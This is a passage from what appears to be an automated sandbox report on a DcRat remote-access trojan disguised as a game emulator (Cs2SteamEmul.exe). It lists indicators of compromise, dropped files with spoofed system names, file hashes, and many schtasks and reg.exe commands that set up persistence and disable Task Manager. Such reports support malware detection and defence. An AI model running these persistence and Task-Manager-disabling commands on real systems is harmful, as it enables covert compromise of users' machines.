Sidebar\\Shared Gadgets\\fontdrvhost.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Windows\\Setup\\State\\sppsvc.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchHost = "\"C:\\ChainSurrogateref\\SearchHost.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files\\Uninstall Information\\smss.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\ChainSurrogateref\\conhost.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\updates\\308046B0AF4A39CB\\winlogon.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\ChainSurrogateref\\smss.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Users\\Admin\\OfficeClickToRun.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files\\Uninstall Information\\smss.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\WindowsRE\\csrss.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\dwm.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\dwm.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\spoolsv.exe\"" hyperBrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\Speech\\RuntimeBroker.exe\"" hyperBrowser.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 pastebin.com 2 pastebin.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ipinfo.io 7 ipinfo.io -
Drops file in Program Files directory 15 IoCs
description ioc Process File created C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\fontdrvhost.exe hyperBrowser.exe File created C:\Program Files\Uninstall Information\smss.exe hyperBrowser.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\VisualElements\smss.exe hyperBrowser.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\VisualElements\69ddcba757bf72 hyperBrowser.exe File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\6cb0b6c459d5d3 hyperBrowser.exe File created C:\Program Files (x86)\Windows Photo Viewer\en-US\spoolsv.exe hyperBrowser.exe File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\e1ef82546f0b02 hyperBrowser.exe File created C:\Program Files\Windows Mail\spoolsv.exe hyperBrowser.exe File created C:\Program Files\Windows Mail\f3b6ecef712a24 hyperBrowser.exe File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dwm.exe hyperBrowser.exe File created C:\Program Files\Uninstall Information\69ddcba757bf72 hyperBrowser.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\VisualElements\smss.exe hyperBrowser.exe File created C:\Program Files (x86)\Windows Photo Viewer\en-US\f3b6ecef712a24 hyperBrowser.exe File created C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\5b884080fd4f94 hyperBrowser.exe File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\SppExtComObj.exe hyperBrowser.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Speech\RuntimeBroker.exe hyperBrowser.exe File created C:\Windows\Speech\9e8d7a4ca61bd9 hyperBrowser.exe File created C:\Windows\Setup\State\sppsvc.exe hyperBrowser.exe File created C:\Windows\Setup\State\0a1fd5f707cd16 hyperBrowser.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings hyperBrowser.exe Key created \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings Cs2SteamEmul.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4660 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 54 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1180 schtasks.exe 3472 schtasks.exe 2924 schtasks.exe 1168 schtasks.exe 5672 schtasks.exe 1664 schtasks.exe 3288 schtasks.exe 4504 schtasks.exe 1156 schtasks.exe 756 schtasks.exe 2356 schtasks.exe 2760 schtasks.exe 5436 schtasks.exe 568 schtasks.exe 788 schtasks.exe 6132 schtasks.exe 1856 schtasks.exe 3552 schtasks.exe 1996 schtasks.exe 3780 schtasks.exe 6076 schtasks.exe 3400 schtasks.exe 1612 schtasks.exe 4668 schtasks.exe 3436 schtasks.exe 4156 schtasks.exe 2732 schtasks.exe 2212 schtasks.exe 3448 schtasks.exe 2388 schtasks.exe 832 schtasks.exe 4052 schtasks.exe 2164 schtasks.exe 3856 schtasks.exe 480 schtasks.exe 1668 schtasks.exe 4608 schtasks.exe 5668 schtasks.exe 844 schtasks.exe 5496 schtasks.exe 2112 schtasks.exe 1360 schtasks.exe 1940 schtasks.exe 1900 schtasks.exe 1700 schtasks.exe 3900 schtasks.exe 1680 schtasks.exe 2376 schtasks.exe 492 schtasks.exe 5172 schtasks.exe 644 schtasks.exe 2744 schtasks.exe 2068 schtasks.exe 1632 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 51 IoCs
pid Process 2828 hyperBrowser.exe 2828 hyperBrowser.exe 2828 hyperBrowser.exe 2828 hyperBrowser.exe 2828 hyperBrowser.exe 2828 hyperBrowser.exe 2828 hyperBrowser.exe 2828 hyperBrowser.exe 2828 hyperBrowser.exe 2828 hyperBrowser.exe 2828 hyperBrowser.exe 2828 hyperBrowser.exe 2828 hyperBrowser.exe 2828 hyperBrowser.exe 2828 hyperBrowser.exe 2828 hyperBrowser.exe 2828 hyperBrowser.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe 6064 winlogon.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2828 hyperBrowser.exe Token: SeDebugPrivilege 6064 winlogon.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 2776 wrote to memory of 5844 2776 Cs2SteamEmul.exe 79 PID 2776 wrote to memory of 5844 2776 Cs2SteamEmul.exe 79 PID 2776 wrote to memory of 5844 2776 Cs2SteamEmul.exe 79 PID 5844 wrote to memory of 5896 5844 WScript.exe 80 PID 5844 wrote to memory of 5896 5844 WScript.exe 80 PID 5844 wrote to memory of 5896 5844 WScript.exe 80 PID 5896 wrote to memory of 2828 5896 cmd.exe 82 PID 5896 wrote to memory of 2828 5896 cmd.exe 82 PID 2828 wrote to memory of 672 2828 hyperBrowser.exe 138 PID 2828 wrote to memory of 672 2828 hyperBrowser.exe 138 PID 5896 wrote to memory of 4660 5896 cmd.exe 140 PID 5896 wrote to memory of 4660 5896 cmd.exe 140 PID 5896 wrote to memory of 4660 5896 cmd.exe 140 PID 672 wrote to memory of 3296 672 cmd.exe 141 PID 672 wrote to memory of 3296 672 cmd.exe 141 PID 672 wrote to memory of 6064 672 cmd.exe 142 PID 672 wrote to memory of 6064 672 cmd.exe 142 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Cs2SteamEmul.exe"C:\Users\Admin\AppData\Local\Temp\Cs2SteamEmul.exe"1⤵
- DcRat
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ChainSurrogateref\s70leb7kkd32CLdRUKa.vbe"2⤵
- Suspicious use of WriteProcessMemory
PID:5844 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ChainSurrogateref\xpD7eJ.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:5896 -
C:\ChainSurrogateref\hyperBrowser.exe"C:\ChainSurrogateref\hyperBrowser.exe"4⤵
- DcRat
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\hE4YweB2y9.bat"5⤵
- Suspicious use of WriteProcessMemory
PID:672 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:26⤵PID:3296
-
-
C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\winlogon.exe"C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\winlogon.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6064
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵
- Modifies registry key
PID:4660
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\VisualElements\smss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1180
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\VisualElements\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2112
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\VisualElements\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1632
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Mail\spoolsv.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5496
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\spoolsv.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3400
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Mail\spoolsv.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1360
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 5 /tr "'C:\ChainSurrogateref\SearchHost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1612
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchHost" /sc ONLOGON /tr "'C:\ChainSurrogateref\SearchHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3472
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 6 /tr "'C:\ChainSurrogateref\SearchHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3288
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2924
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1168
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6132
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\ChainSurrogateref\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1856
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\ChainSurrogateref\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2212
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\ChainSurrogateref\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2356
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dwm.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2164
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3448
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\ChainSurrogateref\conhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1940
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\ChainSurrogateref\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4668
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\ChainSurrogateref\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3436
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\spoolsv.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\spoolsv.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:480
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\spoolsv.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2760
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Windows\Speech\RuntimeBroker.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1900
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Speech\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5172
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1668
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 14 /tr "'C:\ChainSurrogateref\SearchHost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5668
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchHost" /sc ONLOGON /tr "'C:\ChainSurrogateref\SearchHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2388
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 12 /tr "'C:\ChainSurrogateref\SearchHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5436
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\winlogon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:644
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:568
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2744
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\fontdrvhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3856
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:788
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4156
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\SppExtComObj.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2376
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5672
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:832
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Windows\Setup\State\sppsvc.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\Setup\State\sppsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:492
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Windows\Setup\State\sppsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1664
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\ChainSurrogateref\smss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1700
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\ChainSurrogateref\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3900
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\ChainSurrogateref\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4052
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files\Uninstall Information\smss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1996
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3780
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Program Files\Uninstall Information\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2732
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Pictures\cmd.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2068
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Public\Pictures\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4608
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Pictures\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:756
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4504
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1156
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6076
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:5892
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.5MB
MD5fb9e236436cde0a5a4eed038eaddcba0
SHA1b952200d5fc543b905081e871d0f17cd86fe614f
SHA256cbc2a097f5d12d79a5b79af092afba8eee19305a82e3663bcdf7a312bf3b6d49
SHA51222c83c980a1df703d66f10ea11caaf187c9081c5b85039e4206f4a34418bc030af3baee128873e7bb6f45bd59132cc6191fd9fba3c8818d94c81105ec11a130c
-
Filesize
211B
MD54410becb8d48b0f40a82e8d65460e611
SHA123971351f410149ee5f076de87985cd6b4ab49dc
SHA256ce4270f5351b45f9a102cb09b20dec64956cb4ab81a36fb6efa0689ab8755ce5
SHA512539bfef68779f8c70a82346bb2410fe335a79cecba2c17f4d4f8d83e74ed85a6cd1d36ad4a55945b7283e73de65cec7aa45280c9f19e49a4d0f316857d42a3ed
-
Filesize
162B
MD5eaa1aa25e323d5ea76d80a5ddbfeca3c
SHA1a9ce156083afb97e63800dda5ee1e99d845b3a18
SHA2567bd09663e812891268d97ecf21ea8d6669252fdcb2d3e24c9834252cadc21263
SHA512f8d204db10ac0b32ebcd9266c4022d342fd2a7a520428eb585dbda826d79ed8744ed6dfd196821bb8bca6a786eabf77af2acbf0080db488e54b07abe1cf78aa7
-
Filesize
266B
MD54da2209ef11747aa8c538c7b0f52eaff
SHA1054c192324e1ae39ad88618aba0e112eb091e0ab
SHA256ac91ebcf7b54297aec1849e9211cbe994ed495ae4f166f69222338fdf9f73d74
SHA512059390459cdba5a081b07a26b67e45d0b0e0804516e2293064780a7663f865e606ba58b18c6cf81d15d136a89ea8d31a79c045f0176c871dd68eb8a8ddcd513a